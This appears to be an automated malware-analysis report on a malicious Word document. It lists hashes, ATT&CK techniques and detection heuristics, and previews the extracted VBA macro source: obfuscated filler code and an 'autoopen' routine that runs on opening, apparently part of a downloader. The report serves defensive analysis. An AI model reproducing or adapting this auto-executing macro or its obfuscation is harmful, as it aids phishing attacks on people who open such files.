Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f62e2bb27a4274db…

MALICIOUS

Office (OLE)

Size: 154.9 KB
Created: 2019-04-08 13:35:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: 3d0b1fcf68e2af6708f2e7c45d2f1990
SHA-1: 97eec26627ee6307753097fde17c15f084fbc2f1
SHA-256: f62e2bb27a4274db03c1760f3ccf58da7d8af6e63157e7b4e7fd02d346c54464
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing obfuscated VBA macros. The presence of AutoOpen and GetObject calls, along with the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic, indicates that the macro is designed to execute automatically upon opening. The obfuscated nature of the script suggests it is likely a downloader for a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Malware.00536d-6934200-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6934200-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 46224 bytes
SHA-256: 5c4e1ec85368a80b4d6e612339ba3aa95e19b8e18f116051d456e4450cf250e8

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "mAACBDCw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "oAQXUQ_Q"
Attribute VB_Base = "0{2169CF3F-0B53-4BB2-8E1F-875C14052734}{63A5F89F-BD0E-423F-9659-BF043C9837C0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "lkAwckQk"
Attribute VB_Base = "0{FC817B6C-9041-4CC9-803E-4B25CAB02895}{29686D0B-93B4-40F6-83E1-34574A0CF500}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "CABxAA"
Function vA1UAA()
      If FAGGBB = 313372695 Then
      Select Case hCAAcAZx
         Case 121232854
            Day _
CInt(965307846)
            Day CStr(nQBQA_ _
* 496390280 / 402171650 + Log(jBDDxw))
            Day 251088079
         Case 265310072
            Day 235799612
            Day _
Atn(652598903)
            Day Cos(oAQk_BA + _
CSng(uA1ABwwX))
      End Select
      If IBkcA1 Xor QAAkDAoG Then
         Day _
Hex(618810825)
      End If
   End If
      If W1AAAA = 665193236 Then
      Select Case VAAxA4X
         Case 342241516
            Day _
CInt(932472039)
            Day CStr(uXUAAA _
* 350887855 / 488765424 + Log(UwAQ_4A))
            Day 142209313
         Case 775872963
            Day 879494183
            Day _
Atn(466367803)
            Day Cos(l1AADUA + _
CSng(VUXBABA))
      End Select
      If pBBUAAwQ Xor AACAQAAw Then
         Day _
Hex(273447048)
      End If
   End If
      If hoBBAAcc = 731342693 Then
      Select Case KcAABA
         Case 715134354
            Day _
CInt(459955011)
            Day CStr(dACU1_AB _
* 468436249 / 647590869 + Log(pUABA1))
            Day 517255060
         Case 65274343
            Day 413293965
            Day _
Atn(740998275)
            Day Cos(ocUAAcAU + _
CSng(jZAkABkA))
      End Select
      If AoAAxG Xor nAGUQDA_ Then
         Day _
Hex(428501370)
      End If
   End If
End Function
Sub autoopen()
jBCQGQB
End Sub
Function UUAkZAXU()
      If TCAAAC = 950982557 Then
      Select Case IwQCADA
         Case 108145216
            Day _
CInt(138950586)
            Day CStr(oAQZ_kZB _
* 517580962 / 519418361 + Log(jBwUUk))
            Day 363422676
         Case 261578212
            Day 772654062
            Day _
Atn(312564739)
            Day Cos(mBoCAZ + _
CSng(f1ZACAAU))
      End Select
      If dAxUAxAo Xor cAXACA Then
         Day _
Hex(684739659)
      End If
   End If
      If MD11QB = 904048746 Then
      Select Case CAACGCxA
         Case 757807086
            Day _
CInt(64329881)
            Day CStr(m_QAADAA _
* 164761185 / 447245792 + Log(MADAAAk))
            Day 146252445
         Case 172019570
            Day 49619077
            Day _
Atn(245912927)
            Day Cos(TBA4QB + _
CSng(KBAD4__A))
      End Select
      If joZAUQoG Xor mBAcXA Then
         Day _
Hex(870647504)
      End If
   End If
      If oB1U1UA4 = 962010802 Then
      Select Case uAcxUxX
         Case 986015555
            Day _
CInt(100819250)
            Day CStr(Y4AAUAA _
* 338029331 / 114436963 + Log(LGDDcB))
            Day 893329690
         Case 963468270
            Day 563381152
            Day _
Atn(201253118)
            Day Cos(cBDUAUUA + _
CSng(zXQxxQC))
      End Select
      If CCkc_QA_ Xor d4_DAAQx Then
         Day _
Hex(463838348)
      End If
   End If
End Function


Attribute VB_Name = "nBQAZ_GQ"
Function l4QUBABB()
      If GQADUc = 815072326 Then
      Select Case wcwoA_
         Case 641480310
            Day _
CInt(722274944)
      
... (truncated)